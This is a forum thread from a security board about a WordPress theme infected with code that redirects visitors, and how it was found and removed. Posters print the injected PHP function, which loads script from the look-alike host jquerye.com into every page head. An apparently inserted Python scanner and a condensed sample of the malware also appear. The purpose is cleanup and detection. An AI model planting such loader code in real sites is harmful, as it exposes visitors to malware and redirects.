Avast WEBforum
Other => Viruses and worms => Topic started by: geryeo on August 23, 2012, 11:42:10 PM
-
Hello,
I just started a new website a few weeks ago, using WordPress + goodnews 3.4 theme. But yesterday when I clicked on a post, "something" redirected me to this strange website: downloadmusicfreenow.com.
I can't figure out what can be infected... Please help me fix this.
Thank you!
-
Hi geryeo,
Can you provide the specific post you were on? Use hXtp:// instead of http://.
~!Donovan
-
Hi geryeo,
Wait for !Donovan to sort this out, but consider these WOT web rep results: http://www.mywot.com/en/scorecard/downloadmusicfreenow.com?utm_source=addon&utm_content=popup-donuts
The site is given as a malvertiser, so that is likely what will be turned up...
For your site I get a WordPress alert Web application version:
WordPress version: WordPress
Wordpress Version 3.3 or 3.4 based on: htxp://danongonline.net/wp-includes/js/autosave.js
WordPress theme: htxp://danongonline.net/wp-content/themes/goodnews34/
Wordpress internal path: /home/ducvan/public_html/danongonline.net/wp-content/themes/goodnews34/index.php
There could be a code issue here:
s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1 benign
[nothing detected] (script) s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1
status: (referer=danongonline.net/)saved 23917 bytes 54d6e2713dbe666dfb1c9339d1550616c2204807
info: [img] s.gravatar.com/js/
info: [decodingLevel=0] found JavaScript
suspicious:
For further website security issues, see: http://net.saferpage.de/danongonline
polonus
-
@Donovan Sorry, I don't remember that post...
But I found in the theme folder .../post.php this part of code which looks very strange: ... jquerye.com/jquery-1.6.3.min.js ...
Shouldn't there be jquery.com?
Is there any good malware scanner site where I can upload the theme (I think the problem is there) and check it?
Thanks
-
Yes geryeo, that is malcode. !Donovan reported a similar case in another thread... jqueries was used there (plural); apparently they are variations on the same injected malcode theme,
polonus
-
Ok, so now I just need to delete that part with ...jquerye.com/jquery-1.6.3.min.js... to solve it?
Thanks polonus
-
Hi geryeo,
You are welcome. Here is what the Sucuri Blog had on this: http://blog.sucuri.net/2012/07/fake-jquery-website-serving-redirection-malware.html
blog article author = dre armeda
polonus
-
Just to leave this as a reference for all who have a similar problem:
The code that I had in my WordPress website was inside the theme folder in a file called functions.init.php and it looked like this:
if (!function_exists('insert_jquery_slider')) {
    function insert_jquery_slider ()
    {
        if (function_exists('curl_init')) {
            $url = "http://www.jquerye.com/jquery-1.6.3.min.js";
            $ch = curl_init();
            $timeout = 5;
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
            $data = curl_exec($ch);
            curl_close($ch);
            echo $data;
        }
    }
    add_action('wp_head', 'insert_jquery_slider');
}
If you ever happen to be in the same place, this is how to solve it:
Just search in all your files by text and look for “jquerye” or, even better, for “insert_jquery_slider” or any of the patterns you see in the piece of code above. That should point you to where you need to look! (hint: just remove the whole function)
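-
Added example, not part of the original thread and not code from any poster or vendor: a small Python scanner that automates the text search described above, checking theme files for look-alike jQuery hosts, the function name quoted in the thread, and the fetch-and-echo-into-wp_head shape of the injected code. The host allowlist and the names scan_text and scan_tree are assumptions made for this example, and SAMPLE is a constructed string condensed from the code posted above.

```python
import re
from pathlib import Path

# Assumed allowlist of hosts a theme may legitimately load jQuery from; extend as needed.
LEGIT_HOSTS = {"jquery.com", "code.jquery.com", "ajax.googleapis.com"}
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
# Shape of the injected function in the thread: curl_exec() output echoed from a wp_head hook.
FETCH_RE = re.compile(r"curl_exec\s*\(", re.I)
ECHO_RE = re.compile(r"\becho\s+\$\w+", re.I)
HOOK_RE = re.compile(r"add_action\s*\(\s*['\"]wp_head['\"]", re.I)
# Constructed sample, condensed from the code quoted in the thread.
SAMPLE = """<?php function insert_jquery_slider() {
  $ch = curl_init("http://www.jquerye.com/jquery-1.6.3.min.js");
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  $data = curl_exec($ch); curl_close($ch); echo $data; }
add_action('wp_head', 'insert_jquery_slider'); ?>"""


def lookalike_hosts(text):
    """Return hosts whose name contains 'jquer' but is not on the allowlist."""
    hits = set()
    for host in HOST_RE.findall(text):
        host = re.sub(r"^www\.", "", host.lower())
        if "jquer" in host and host not in LEGIT_HOSTS:
            hits.add(host)
    return sorted(hits)


def scan_text(text):
    """Return a list of findings for one PHP source string."""
    findings = ["lookalike host: " + h for h in lookalike_hosts(text)]
    if "insert_jquery_slider" in text:
        findings.append("function name from the thread: insert_jquery_slider")
    if FETCH_RE.search(text) and ECHO_RE.search(text) and HOOK_RE.search(text):
        findings.append("remote content echoed into wp_head")
    return findings


def scan_tree(root):
    """Scan every .php file under root; return {path: findings} for flagged files."""
    report = {}
    for path in Path(root).rglob("*.php"):
        found = scan_text(path.read_text(errors="replace"))
        if found:
            report[str(path)] = found
    return report
```

Call scan_tree() on a copy of the theme folder and review each flagged file by hand before deleting anything. The function-name and fetch-and-echo checks do not depend on the URL, so they still fire if the host string has been edited.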
-
Hi RamyNasr,
We thank you very much for the solutions you found. Glad we could help to arrive there. Stay safe and secure,
polonus
-
Hi, I don't know if I'm a little late to post in here regarding this issue. I am having the same problem. I am trying to edit
<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquery.com";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>
I just don't know what part to take out exactly. When mentioned one person said to remove the function, I just need to know exactly what part of the code is the function, as I am totally new to this stuff....I have tried taking certain parts of it out, and I just mess things up. Any help will be greatly appreciated! Thank you in advance.
-
Everything that you posted is part of the function. Did you try removing the whole line?
Also: The code you provide says jquery.com, not jquerye.com. Is there any specific reason why you want to remove this?
~!Donovan